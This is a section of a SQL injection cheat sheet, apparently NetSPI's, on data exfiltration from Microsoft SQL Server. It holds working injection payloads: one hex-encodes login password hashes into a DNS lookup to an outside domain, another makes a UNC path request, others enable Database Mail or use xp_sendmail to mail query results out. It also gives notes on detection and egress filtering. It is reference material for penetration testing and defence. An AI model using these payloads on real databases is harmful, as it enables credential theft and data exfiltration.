<h3 id="data-exfiltration">Data Exfiltration</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.dataExfiltration}}</p>
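<p><i>Note: It is possible to make a DNS request from MSSQL. However, this request requires administrator privileges and SQL Server 2005. The DNS and UNC path techniques below only work when the database host can resolve external names and open outbound SMB connections, so egress filtering on the server blocks them, and DNS logs showing long, hex-encoded hostnames reveal them. The mail techniques need either Database Mail XPs, which must first be switched on through sp_configure (a configuration change that can be audited), or xp_sendmail, which belongs to the legacy SQL Mail feature and is not available in current SQL Server releases.</i></p>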
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th>Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Make DNS Request</td>
<td>DECLARE @host varchar(800);<br>select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;<br>exec('xp_fileexist "\' + @host + 'c$boot.ini"');</td>
</tr>
<tr>
<td>UNC Path (DNS Request)</td>
<td>
xp_dirtree '\\data.domain.com\file' <br>
The UNC Path Injection Cheatsheet can be found <a href="https://github.com/NetSPI/PowerUpSQL/wiki/SQL-Server---UNC-Path-Injection-Cheat-Sheet">here</a>.
</td>
</tr>
<tr>
<td>Enable sp_send_dbmail and send query</td>
<td>sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version';</td>
</tr>
<tr>
<td>Basic xp_sendmail Query</td>
<td>EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'</td>
</tr>
<tr>
<td>Send Full Email with xp_sendmail</td>
<td>EXEC xp_sendmail @recipients='harold@netspi.com',<br>@message='This is a test.',<br>@copy_recipients='test@netspi.com',<br>@subject='TEST'</td>
</tr>
<tr>
<td>Send Query Results Via xp_sendmail</td>
<td>EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';</td>
</tr>
<tr>
<td>Send Query Results as Attachment Via xp_sendmail</td>
<td>CREATE TABLE ##texttab (c1 text)<br>INSERT ##texttab values ('Put messge here.')<br>DECLARE @cmd varchar(56)<br>SET @cmd = 'SELECT c1 from ##texttab'<br>EXEC master.dbo.xp_sendmail 'robertk',<br>@query = @cmd, @no_header='TRUE'<br>DROP TABLE ##texttab</td>
</tr>
</tbody>
</table>